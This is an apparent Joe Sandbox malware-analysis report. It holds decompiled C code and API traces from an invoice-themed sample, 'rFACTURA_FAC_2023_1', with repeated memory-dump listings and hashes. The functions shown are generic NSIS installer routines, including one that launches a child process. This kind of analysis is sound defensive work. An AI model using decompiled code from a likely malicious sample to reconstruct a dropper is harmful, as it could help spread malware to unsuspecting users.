Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction ID: 05de0a4d5a0d3ad16659c86bea74b86f68b6b4ad9b47f793b7e3caf381fa8301
Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction Fuzzy Hash: 10C09BB17843017BDE109B509D49F0777585BE0741F15857D7350F50E0C674E450D61D

Uniqueness

Uniqueness Score: -1.00%

Function 00403308 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403308(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403316
0x0040331c

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404229 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404229(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a28, 0x28, _a4, "true"); // executed
				return _t2;
			}

0x00404237
0x0040423d

APIs

SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

Uniqueness

Uniqueness Score: -1.00%

Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404216(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7a1f1c, _a4); // executed
				return _t2;
			}

0x00404220
0x00404226

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052C3(0xffffffeb, _t7); // executed
				_t9 = E00405844(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E004066EA(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004061A6( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f06
0x00401f0b
0x00401f11
0x00401f16
0x00401f1a
0x00402885
0x00401f20
0x00401f23
0x00401f26
0x00401f2e
0x00401f3d
0x00401f3f
0x00401f3f
0x00401f30
0x00401f34
0x00401f34
0x00401f2e
0x00401f46
0x00401f47
0x00401f47
0x00402ac2
0x00402ace

APIs

Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Part of subcall function 00405844: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
Part of subcall function 00405844: CloseHandle.KERNEL32(?), ref: 0040587A

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F47

Part of subcall function 004066EA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401EFB,?,?,?,?,?,?), ref: 004066FB
Part of subcall function 004066EA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040671D

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 9645f34456babddffe365cced8570490a305f219a8dabac6956c86f0a67676f6
Instruction ID: 4cd38a76db1ec19436dc127f491775ffefe8ed04147ea9162fb687742d6809c2
Opcode Fuzzy Hash: 9645f34456babddffe365cced8570490a305f219a8dabac6956c86f0a67676f6
Instruction Fuzzy Hash: 63F09032905111DBCF20FBA19E849DE66B4AF01328B25457BF501F61D1C77C4E518AAE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404C3F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404C3F(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				long _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x7a8a68;
				_t282 = 0;
				_v24 =  *0x7a8a34 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x7a8a3d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404B8D(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x7a8a3c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x7a1f04;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x7a1f18;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x7a1f04 = _t282;
								 *0x7a1f18 = _t282;
								 *0x7a8aa0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x7a8a3d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404C0D();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x7a1f18;
									_t195 =  *0x7a8a68;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x7a8a6c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, "true");
										_t197 =  *0x7a79fc; // 0xb8007e
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404B48(0x3ff, 0xfffffffb, E00404B60(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x7a8a6c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x7a1f18);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x7a8aa0 = _t306;
					 *0x7a1f18 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
					_t252 = LoadBitmapW( *0x7a8a20, 0x6e);
					 *0x7a1f0c =  *0x7a1f0c | 0xffffffff;
					_t313 = _t252;
					 *0x7a1f14 = SetWindowLongW(_v8, 0xfffffffc, E00405237);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f04 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f04);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406281(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004041F4(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004041F4(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x7a8a6c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x7a1f18 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x7a1f18 + _t316 * 4) = _t276;
									_t284 =  *( *0x7a1f18 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x7a8a6c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404229(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404229(_v12);
								L91:
								return E0040425B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404c4e
0x00404c5f
0x00404c64
0x00404c6c
0x00404c72
0x00404c7a
0x00404c88
0x00404c8b
0x00404eac
0x00404eb3
0x00404ec7
0x00404eb5
0x00404eb7
0x00404eba
0x00404ebb
0x00404ec2
0x00404ec2
0x00404ed3
0x00404ee1
0x00404ee4
0x00404efa
0x00404f6f
0x00404f72
0x00404f74
0x00404f7e
0x00404f8c
0x00404f8c
0x00404f8e
0x00404f98
0x00404f9e
0x00404fa1
0x00404fa4
0x00404fbf
0x00404fa6
0x00404fb0
0x00404fb0
0x00404fa4
0x00404f98
0x00000000
0x00404f72
0x00404eff
0x00404f0a
0x00404f0f
0x00404f16
0x00404f1b
0x00404f1f
0x00404f2a
0x00404f2a
0x00404f2e
0x00404f32
0x00404f36
0x00404f49
0x00404f38
0x00404f38
0x00404f3f
0x00404f45
0x00404f41
0x00404f41
0x00404f41
0x00404f3f
0x00404f4d
0x00404f4f
0x00404f62
0x00404f65
0x00404f68
0x00404f68
0x00404f32
0x00000000
0x00404f1f
0x00404f01
0x00404f08
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404fc2
0x00404fc2
0x00404fc9
0x0040503a
0x00405042
0x0040504a
0x0040504a
0x00405053
0x00405055
0x0040505c
0x0040505f
0x0040505f
0x00405065
0x0040506c
0x0040506f
0x0040506f
0x00405075
0x0040507b
0x00405081
0x00405081
0x0040508e
0x004051e4
0x004051eb
0x00405208
0x0040520e
0x00405220
0x00405220
0x00000000
0x00405094
0x00405096
0x0040509b
0x004050a0
0x004050a5
0x004050a7
0x004050a7
0x004050a8
0x004050a9
0x004050ab
0x004050ab
0x004050b3
0x004050f4
0x004050f6
0x00405106
0x00405109
0x0040510e
0x00405115
0x00405118
0x004051ba
0x004051c0
0x004051c6
0x004051ce
0x004051df
0x004051df
0x00000000
0x004051ce
0x0040511e
0x00405121
0x00405127
0x0040512c
0x0040512e
0x00405130
0x00405136
0x0040513d
0x00405142
0x00405149
0x0040514c
0x0040514c
0x00405153
0x0040515f
0x00405163
0x00405165
0x00405165
0x00405155
0x00405157
0x00405157
0x00405185
0x00405191
0x004051a0
0x004051a0
0x004051a2
0x004051a5
0x004051ae
0x00000000
0x004050b5
0x004050c0
0x004050c3
0x004050c8
0x004050ca
0x004050ce
0x004050de
0x004050e8
0x004050ea
0x004050ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004050d0
0x004050d0
0x004050d6
0x004050d8
0x004050d8
0x004050d9
0x004050da
0x00000000
0x004050d0
0x004050b3
0x0040508e
0x00404fd1
0x00000000
0x00404fe7
0x00404ff1
0x00404ff6
0x00000000
0x00000000
0x00405008
0x0040500d
0x00405019
0x00405019
0x0040501b
0x0040502a
0x0040502c
0x00405030
0x00405033
0x00000000
0x00405033
0x00404fd1
0x00404c91
0x00404c96
0x00404c9f
0x00404ca6
0x00404cb4
0x00404cbf
0x00404cc5
0x00404cd3
0x00404ce7
0x00404cec
0x00404cf9
0x00404cfe
0x00404d14
0x00404d25
0x00404d32
0x00404d32
0x00404d35
0x00404d3b
0x00404d3d
0x00404d40
0x00404d45
0x00404d4a
0x00404d4c
0x00404d4c
0x00404d6c
0x00404d6c
0x00404d6e
0x00404d6f
0x00404d74
0x00404d77
0x00404d7a
0x00404d7e
0x00404d83
0x00404d88
0x00404d8c
0x00404d91
0x00404d96
0x00404d98
0x00404da0
0x00404e6b
0x00404e7e
0x00000000
0x00404da6
0x00404da9
0x00404dac
0x00404daf
0x00404daf
0x00404db6
0x00404dbc
0x00404dbf
0x00404dc5
0x00404dc6
0x00404dcb
0x00404dd4
0x00404ddb
0x00404dde
0x00404de1
0x00404de4
0x00404e20
0x00404e49
0x00404e22
0x00404e2f
0x00404e2f
0x00404de6
